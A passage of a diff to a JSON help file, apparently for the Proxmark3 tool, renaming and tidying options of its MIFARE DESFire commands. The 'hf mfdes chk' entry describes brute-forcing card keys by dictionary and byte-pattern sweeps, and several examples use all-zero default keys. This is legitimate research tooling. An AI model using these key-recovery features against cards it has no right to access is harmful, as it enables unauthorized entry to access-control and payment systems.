(hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of application (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--oldalgo old key crypto algorithm: des, 2tdea, 3tdea, aes", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of application (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "--oldalgo old key crypto algorithm", "--oldkey old key (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "--newkeyno key number for change", - "--newalgo new key crypto algorithm: des, 2tdea, 3tdea, aes", - "--newkey new key (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "--newver new key's version (1 hex byte)" + "--newkeyno key number for change", + "--newalgo new key crypto algorithm", + "--newkey new key (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--newver version of new key (1 hex byte)" ], - "usage": "hf mfdes changekey [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--oldalgo ] [--oldkey ] [--newkeyno ] [--newalgo ] [--newkey ] [--newver ]" + "usage": "hf mfdes changekey [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--oldalgo ] [--oldkey ] [--newkeyno ] [--newalgo ] [--newkey ] [--newver ]" }, "hf mfdes chfilesettings": { "command": "hf mfdes chfilesettings", "description": "get file settings from file from application. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes chfilesettings --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 -> change file settings app=123456, file=01 with defaults from `default` command", - "hf mfdes chfilesettings -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 --rawdata 00eeee -> execute with default factory setup", + "hf mfdes chfilesettings -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 --rawdata 00eeee -> execute with default factory setup", "hf mfdes chfilesettings --aid 123456 --fid 01 --rawdata 810000021f112f22 -> change file settings with additional rights for keys 1 and 2", - "hf mfdes chfilesettings --appisoid df01 --fid 00 --amode plain --rawrights eee0 -s lrp -t aes -> change file settings via lrp channel" + "hf mfdes chfilesettings --isoid df01 --fid 00 --amode plain --rawrights eee0 -s lrp -t aes -> change file settings via lrp channel" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", - "--rawdata file settings (hex > 5 bytes). have priority over the other settings.", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--rawdata file settings (hex > 5 bytes). have priority over the other settings", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication" ], - "usage": "hf mfdes chfilesettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth]" + "usage": "hf mfdes chfilesettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth]" }, "hf mfdes chk": { "command": "hf mfdes chk", @@ -4365,19 +4421,19 @@ "offline": false, "options": [ "-h, --help this help", - "--aid use specific aid (3 hex bytes, big endian)", - "-k, --key key for checking (hex 16 bytes)", - "-d, --dict file with keys dictionary", + "--aid use specific aid (3 hex bytes, big endian)", + "-k, --key key for checking (hex 16 bytes)", + "-d, --dict dictionary file with keys", "--pattern1b check all 1-byte combinations of key (0000...0000, 0101...0101, 0202...0202, ...)", "--pattern2b check all 2-byte combinations of key (0000...0000, 0001...0001, 0002...0002, ...)", "--startp2b start key (2-byte hex) for 2-byte search (use with `--pattern2b`)", - "-j, --json json file to save keys", - "-v, --verbose verbose mode.", - "-f, --kdf key derivation function (kdf) (0=none, 1=an10922, 2=gallagher)", - "-i, --kdfi kdf input (hex 1-31 bytes)", + "-j, --json json file name to save keys", + "-v, --verbose verbose mode", + "--kdf <0|1|2> key derivation function (kdf) (0=none, 1=an10922, 2=gallagher)", + "-i, --kdfi kdf input (1-31 hex bytes)", "-a, --apdu show apdu requests and responses" ], - "usage": "hf mfdes chk [-hva] [--aid ] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ] [-f ] [-i ]" + "usage": "hf mfdes chk [-hva] [--aid ] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ] [--kdf <0|1|2>] [-i ]" }, "hf mfdes chkeysettings": { "command": "hf mfdes chkeysettings", @@ -4390,46 +4446,46 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "-d, --data key settings (hex 1 byte)" - ], - "usage": "hf mfdes chkeysettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [-d ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "-d, --data key settings (1 hex byte)" + ], + "usage": "hf mfdes chkeysettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [-d ]" }, "hf mfdes clearrecfile": { "command": "hf mfdes clearrecfile", "description": "clear record file. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes clearrecfile --aid 123456 --fid 01 -> clear record file for: app=123456, file=01 with defaults from `default` command", - "hf mfdes clearrecfile --appisoid df01 --fid 01 -s lrp -t aes -n 3 -> clear record file for lrp channel with key number 3" + "hf mfdes clearrecfile --isoid df01 --fid 01 -s lrp -t aes -n 3 -> clear record file for lrp channel with key number 3" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id for clearing (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id for clearing (1 hex byte)", "--no-auth execute without authentication" ], - "usage": "hf mfdes clearrecfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--no-auth]" + "usage": "hf mfdes clearrecfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--no-auth]" }, "hf mfdes createapp": { "command": "hf mfdes createapp", @@ -4472,26 +4528,26 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", + "-t, --algo crypt algo", "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--rawdata raw data that sends to command", "--aid application id for create. mandatory. (3 hex bytes, big endian)", - "--fid iso file id. forbidden values: 0000 3f00, 3fff, ffff. (2 hex bytes, big endian). if specified - enable iso file id over all the files in the app.", - "--dfname iso df name 1..16 chars string", - "--ks1 key settings 1 (hex 1 byte). application master key settings. default 0x0f", - "--ks2 key settings 2 (hex 1 byte). default 0x0e", - "--dstalgo application key crypt algo: des, 2tdea, 3tdea, aes. default des", - "--numkeys number of keys 0x00..0x0e. default 0x0e", + "--fid iso file id. forbidden values: 0000 3f00, 3fff, ffff. (2 hex bytes, big endian)", + "--dfname iso df name (1..16 chars)", + "--ks1 key settings 1 (1 hex byte). application master key settings (def: 0x0f)", + "--ks2 key settings 2 (1 hex byte). (def: 0x0e)", + "--dstalgo application key crypt algo (def: des)", + "--numkeys number of keys 0x00..0x0e (def: 0x0e)", "--no-auth execute without authentication" ], - "usage": "hf mfdes createapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--rawdata ] [--aid ] [--fid ] [--dfname ] [--ks1 ] [--ks2 ] [--dstalgo ] [--numkeys ] [--no-auth]" + "usage": "hf mfdes createapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--rawdata ] [--aid ] [--fid ] [--dfname ] [--ks1 ] [--ks2 ] [--dstalgo ] [--numkeys ] [--no-auth]" }, "hf mfdes createfile": { "command": "hf mfdes createfile", @@ -4503,37 +4559,37 @@ "hf mfdes createfile --aid 123456 --fid 01 --isofid 0001 --size 000010 -> create file with iso id. authentication with defaults from `default` command", "hf mfdes createfile --aid 123456 --fid 01 --rawtype 01 --rawdata 000100eeee000100 -> create file via sending rawdata to the card. can be used to create any type of file. authentication with defaults from `default` command", "hf mfdes createfile --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 -> create file app=123456, file=01 and mentioned rights with defaults from `default` command", - "hf mfdes createfile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 --rawtype 00 --rawdata 00eeee000100 -> execute with default factory setup" + "hf mfdes createfile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 --rawtype 00 --rawdata 00eeee000100 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", - "--isofid iso file id (2 hex bytes)", - "--rawtype raw file type (hex 1 byte)", - "--rawdata raw file settings (hex > 5 bytes)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--isofid iso file id (2 hex bytes)", + "--rawtype raw file type (1 hex byte)", + "--rawdata raw file settings (hex > 5 bytes)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", "--size file size (3 hex bytes, big endian)", "--backup create backupfile instead of standard file" ], - "usage": "hf mfdes createfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--isofid ] [--rawtype ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--backup]" + "usage": "hf mfdes createfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--isofid ] [--rawtype ] [--rawdata ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--backup]" }, "hf mfdes createmacfile": { "command": "hf mfdes createmacfile", @@ -4545,37 +4601,37 @@ "", "hf mfdes createmacfile --aid 123456 --fid 01 --rawrights 0ff0 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file with parameters. rights from default. authentication with defaults from `default` command", "hf mfdes createmacfile --aid 123456 --fid 01 --amode plain --rrights free --wrights deny --rwrights free --chrights key0 --mackey 00112233445566778899aabbccddeeff -> create file app=123456, file=01, with key, and mentioned rights with defaults from `default` command", - "hf mfdes createmacfile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> execute with default factory setup. key and keyver == 0x00..00", - "hf mfdes createmacfile --appisoid df01 --fid 0f -s lrp -t aes --rawrights 0ff0 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel", - "hf mfdes createmacfile --appisoid df01 --fid 0f -s lrp -t aes --rawrights 0f10 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel with commitreaderid command enable" + "hf mfdes createmacfile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> execute with default factory setup. key and keyver == 0x00..00", + "hf mfdes createmacfile --isoid df01 --fid 0f -s lrp -t aes --rawrights 0ff0 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel", + "hf mfdes createmacfile --isoid df01 --fid 0f -s lrp -t aes --rawrights 0f10 --mackey 00112233445566778899aabbccddeeff --mackeyver 01 -> create transaction mac file via lrp channel with commitreaderid command enable" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", - "--mackey aes-128 key for mac (16 hex bytes, big endian). default 0x00..00", - "--mackeyver aes key version for mac (1 hex byte). default 0x00" + "--mackey aes-128 key for mac (16 hex bytes, big endian). (def: all zeros)", + "--mackeyver aes key version for mac (1 hex byte). (def: 0x0)" ], - "usage": "hf mfdes createmacfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--mackey ] [--mackeyver ]" + "usage": "hf mfdes createmacfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--mackey ] [--mackeyver ]" }, "hf mfdes createrecordfile": { "command": "hf mfdes createrecordfile", @@ -4585,36 +4641,36 @@ "key/mode/etc of the authentication depends on application settings", "hf mfdes createrecordfile --aid 123456 --fid 01 --size 000010 --maxrecord 000010 --cyclic -> create cyclic record file with parameters. rights from default. authentication with defaults from `default` command", "hf mfdes createrecordfile --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 --size 000010 --maxrecord 000010 -> create linear record file app=123456, file=01 and mentioned rights with defaults from `default` command", - "hf mfdes createrecordfile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 --size 000010 --maxrecord 000010 -> execute with default factory setup" + "hf mfdes createrecordfile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 --size 000010 --maxrecord 000010 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", - "--isofid iso file id (2 hex bytes)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--isofid iso file id (2 hex bytes)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", "--size record size (3 hex bytes, big endian, 000001 to ffffff)", "--maxrecord max. number of records (3 hex bytes, big endian)", "--cyclic create cyclic record file instead of linear record file" ], - "usage": "hf mfdes createrecordfile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--isofid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--maxrecord ] [--cyclic]" + "usage": "hf mfdes createrecordfile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--isofid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--size ] [--maxrecord ] [--cyclic]" }, "hf mfdes createvaluefile": { "command": "hf mfdes createvaluefile", @@ -4624,56 +4680,56 @@ "key/mode/etc of the authentication depends on application settings", "hf mfdes createvaluefile --aid 123456 --fid 01 --lower 00000010 --upper 00010000 --value 00000100 -> create file with parameters. rights from default. authentication with defaults from `default` command", "hf mfdes createvaluefile --aid 123456 --fid 01 --amode plain --rrights free --wrights free --rwrights free --chrights key0 -> create file app=123456, file=01 and mentioned rights with defaults from `default` command", - "hf mfdes createvaluefile -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> execute with default factory setup" + "hf mfdes createvaluefile -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", - "--amode file access mode: plain/mac/encrypt", - "--rawrights access rights for file (hex 2 byte) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", - "--rrights read file access mode: the specified key, free, deny", - "--wrights write file access mode: the specified key, free, deny", - "--rwrights read/write file access mode: the specified key, free, deny", - "--chrights change file settings access mode: the specified key, free, deny", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", + "--amode file access mode", + "--rawrights access rights for file (2 hex bytes) r/w/rw/chg, 0x0 - 0xd key, 0xe free, 0xf denied", + "--rrights read file access mode: the specified key, free, deny", + "--wrights write file access mode: the specified key, free, deny", + "--rwrights read/write file access mode: the specified key, free, deny", + "--chrights change file settings access mode: the specified key, free, deny", "--no-auth execute without authentication", "--lower lower limit (4 hex bytes, big endian)", "--upper upper limit (4 hex bytes, big endian)", "--value value (4 hex bytes, big endian)", "--lcredit limited credit enabled (bit 0 = limited credit, 1 = freevalue)" ], - "usage": "hf mfdes createvaluefile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--lower ] [--upper ] [--value ] [--lcredit ]" + "usage": "hf mfdes createvaluefile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--amode ] [--rawrights ] [--rrights ] [--wrights ] [--rwrights ] [--chrights ] [--no-auth] [--lower ] [--upper ] [--value ] [--lcredit ]" }, "hf mfdes default": { "command": "hf mfdes default", - "description": "set default parameters for access to desfire card.", + "description": "set default parameters for access to mifare desfire card.", "notes": [ - "hf mfdes default -n 0 -t des -k 0000000000000000 -f none -> save to the default parameters" + "hf mfdes default -n 0 -t des -k 0000000000000000 --kdf none -> save to the default parameters" ], "offline": false, "options": [ "-h, --help this help", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp" + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel" ], - "usage": "hf mfdes default [-h] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ]" + "usage": "hf mfdes default [-h] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ]" }, "hf mfdes deleteapp": { "command": "hf mfdes deleteapp", @@ -4685,101 +4741,101 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of delegated application (3 hex bytes, big endian)" - ], - "usage": "hf mfdes deleteapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of delegated application (3 hex bytes, big endian)" + ], + "usage": "hf mfdes deleteapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ]" }, "hf mfdes deletefile": { "command": "hf mfdes 